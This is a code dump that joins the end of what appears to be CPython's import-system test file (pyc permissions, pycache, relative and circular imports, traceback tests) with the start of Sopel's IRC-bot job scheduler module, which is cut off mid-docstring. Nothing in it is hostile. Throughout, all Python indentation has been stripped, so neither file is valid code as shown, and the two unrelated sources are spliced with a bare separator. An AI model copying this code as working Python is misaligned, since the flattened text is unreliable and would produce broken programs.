# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
jobs.py
|
"""Sopel's Job Scheduler: internal tool for job management.
.. important::
As of Sopel 5.3, this is an internal tool used by Sopel to manage internal
jobs and should not be used by plugin authors. Its usage and documentation
is for Sopel core development and advanced developers. It is subject to
rapid changes between versions without much (or any) warning.
"""
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import annotations
import inspect
import logging
import threading
import time
LOGGER = logging.getLogger(__name__)
class Scheduler(threading.Thread):
"""Generic Job Scheduler.
:param object manager: manager passed to jobs as argument
Scheduler is a :class:`thread <threading.Thread>` that keeps track of
:class:`Jobs <Job>` and periodically checks which ones are ready to
execute. When ready, their :meth:`~Job.execute` method is called, either
in a separate thread or in the scheduler's thread (it depends on the
job's :meth:`~Job.is_threaded` method).
It can be started as any other thread::
# on bot's startup
scheduler = jobs.Scheduler(bot)
scheduler.start() # run the thread forever
Then it runs forever until the :meth:`stop` method is called, usually when
the bot shuts down.
.. note::
Thread safety is ensured with threading's :class:`~threading.Lock`
and :class:`~threading.Event` when:
* a job is :meth:`registered <register>` or
:meth:`removed <remove_callable_job>`
* the scheduler is :meth:`cleared <clear_jobs>` or
:meth:`stopped <stop>`
* the scheduler gets jobs that are ready for execution
These actions can be performed while the scheduler is running.
.. important::
This is an internal tool used by Sopel to manage internal jobs and
should not be used by plugin authors. Its usage and documentation is
for Sopel core development and advanced developers. It is subject to
rapid changes between versions without much (or any) warning.
"""
def __init__(self, manager):
threading.Thread.__init__(self)
self.manager = manager
"""Job manager, used as argument for jobs."""
self.stopping = threading.Event()
"""Stopping flag. See :meth:`stop`."""
self._jobs = []
self._mutex = threading.Lock()
def register(self, job):
"""Register a Job to the current job queue.
:param job: job to register
:type job: :class:`sopel.tools.jobs.Job`
This method is thread safe.
"""
with self._mutex:
self._jobs.append(job)
LOGGER.debug('Job registered: %s', str(job))
def clear_jobs(self):
"""Clear current Job queue and start fresh.
This method is thread safe. However, it won't cancel or stop any
currently running jobs.
"""
with self._mutex:
self._jobs = []
def stop(self):
"""Ask the job scheduler to stop.
The scheduler thread will stop its loop over jobs to process, but it
won't join the thread, or clear its queue—this has to be done
separately by the calling thread::
scheduler.stop() # ask the scheduler to stop
scheduler.join() # wait for the scheduler to actually stop
Note that this won't cancel or stop any currently running jobs.
"""
self.stopping.set()
def remove_callable_job(self, callable):
"""Remove ``callable`` from the job queue.
:param callable callable: the callable to remove
:type callable: :term:`function`
This method is thread safe. However, it won't cancel or stop any
currently running jobs.
"""
with self._mutex:
self._jobs = [
job for job in self._jobs
if job._handler != callable
]
def run(self):
"""Run forever until :meth:`stop` is called.
This method waits at most a second between each iteration. At each step
it retrieves the jobs that are ready for execution, and executes them.
See the :meth:`Job.execute` method for more information.
Internally, it loops forever until its :attr:`stopping` event is set.
.. note::
This should not be called directly, as it will be done by the
:meth:`threading.Thread.start` method.
"""
while not self.stopping.is_set():
try:
now = time.time()
# Collect ready jobs by now
for job in self._get_ready_jobs(now):
self._run_job(job)
# Wait up to a second
time_spent = time.time() - now
wait_time = max(0, 1 - time_spent)
if wait_time:
time.sleep(wait_time)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
LOGGER.debug('Job scheduler stopped by KeyboardInterrupt')
raise
except Exception as error: # TODO: Be specific
LOGGER.error('Error in job scheduler: %s', error)
# Plugins exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.manager.on_scheduler_error(self, error)
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _get_ready_jobs(self, now):
with self._mutex:
jobs = [job for job in self._jobs if job.is_ready_to_run(now)]
return jobs
def _run_job(self, job):
if job.is_threaded():
# make sure the job knows it's running, even though the thread
# isn't started yet.
job.is_running.set()
t = threading.Thread(
target=self._call, args=(job,)
)
t.start()
else:
self._call(job)
def _call(self, job):
"""Wrap the job's execution to handle its state and errors."""
try:
with job:
job.execute(self.manager)
except Exception as error: # TODO: Be specific
LOGGER.error('Error while processing job: %s', error)
self.manager.on_job_error(self, job, error)
class Job:
"""Holds information about when a function should be called next.
:param intervals: set of intervals; each is a number of seconds between
calls to ``handler``
:type intervals: :term:`iterable`
:param str plugin: optional plugin name to which the job belongs
:param str label: optional label (name) for the job
:param handler: function to be called when the job is ready to execute
:type handler: :term:`function`
:param str doc: optional documentation for the job
Job is a simple structure that holds information about when a function
should be called next. They are best used with a :class:`Scheduler`
that will manage job execution when they are ready.
The :term:`function` to execute is the ``handler``, which must be a
callable with this signature::
def handler(manager):
# perform action periodically
# return is optional
The ``manager`` parameter can be any kind of object; usually it's an
instance of :class:`sopel.bot.Sopel`.
When a job is ready, you can execute it by calling its :meth:`execute`
method (providing the appropriate ``manager`` argument)::
if job.is_ready_to_run(time.time()):
job.execute(manager) # marked as running
# "next times" have been updated; the job is not running
In that case, ``execute`` takes care of the running state of the job.
Alternatively, you can use a ``with`` statement to perform action before
and/or after executing the job; in that case, the ``with`` statement takes
precedence, and the :meth:`execute` method won't interfere::
with job:
# the job is now running, you can perform pre-execute action
job.execute() # execute the job's action, no state modification
# the job is still marked as "running"
# you can perform post-execute action
# outside of the with statement, the job is not running anymore
.. seealso::
The :class:`sopel.plugins.jobs.Scheduler` class is specifically
designed for plugins' jobs, expecting an instance of
:class:`sopel.bot.Sopel` as a manager, and should be used to manipulate
plugin jobs.
In all other case, the :class:`sopel.tools.jobs.Scheduler` class is a
generic job scheduler.
"""
@classmethod
def kwargs_from_callable(cls, handler):
"""Generate the keyword arguments to create a new instance.
:param handler: callable used to generate keyword arguments
:type handler: :term:`function`
:return: a map of keyword arguments
:rtype: dict
This classmethod takes the ``handler``'s attributes to generate a map
of keyword arguments for the class. This can be used by the
:meth:`from_callable` classmethod to instantiate a new rule object.
The expected attributes are the ones set by decorators from the
:mod:`sopel.plugin` module.
"""
return {
'plugin': getattr(handler, 'plugin_name', None),
'label': getattr(handler, 'rule_label', None),
'threaded': getattr(handler, 'thread', True),
'doc': inspect.getdoc(handler),
}
@classmethod
def from_callable(cls, settings, handler):
"""Instantiate a Job from the bot's ``settings`` and a ``handler``.
:param settings: bot's settings
:type settings: :class:`sopel.config.Config`
:param handler: callable used to instantiate a new job
:type handler: :term:`function`
"""
kwargs = cls.kwargs_from_callable(handler)
return cls(
set(handler.interval),
handler=handler,
**kwargs)
def __init__(self,
intervals,
plugin=None,
label=None,
handler=None,
threaded=True,
doc=None):
# scheduling
now = time.time()
self.intervals = set(intervals)
"""Set of intervals at which to execute the job."""
self.next_times = dict(
(interval, now + interval)
for interval in self.intervals
)
"""Tracking of when to execute the job next time."""
# meta
self._plugin_name = plugin
self._label = label
self._doc = doc
# execution
self._handler = handler
self._threaded = bool(threaded)
self.is_running = threading.Event()
"""Running flag: it tells if the job is running or not.
This flag is set and cleared automatically by the :meth:`execute`
method. It is also set and cleared when the job is used with the
``with`` statement::
with job:
# you do something before executing the job
# this ensures that the job is marked as "running"
.. note::
When set manually or with the ``with`` statement, the
:meth:`execute` method won't clear this attribute itself.
"""
def __enter__(self):
self.is_running.set()
def __exit__(self, exc_type, exc_value, traceback):
self.next(time.time())
self.is_running.clear()
def __str__(self):
"""Return a string representation of the Job object.
Example result::
<Job periodic_check [5s]>
<Job periodic_check [60s, 3600s]>
Example when the job is tied to a plugin::
<Job reminder.remind_check [2s]>
"""
try:
label = self.get_job_label()
except RuntimeError:
label = '(unknown)'
plugin_name = self.get_plugin_name()
if plugin_name:
label = '%s.%s' % (plugin_name, label)
return "<Job %s [%s]>" % (
label,
', '.join('%ss' % i for i in sorted(self.intervals)),
)
def get_plugin_name(self):
"""Get the job's plugin name.
:rtype: str
The job's plugin name will be used in various places to select,
register, unregister, and manipulate the job based on its plugin, which
is referenced by its name.
"""
return self._plugin_name
def get_job_label(self):
"""Get the job's label.
:rtype: str
A job can have a label, which can identify the job by string, the same
way rules can be. This label can be used to manipulate or display the
job's information in a more human-readable way. Note that the label has
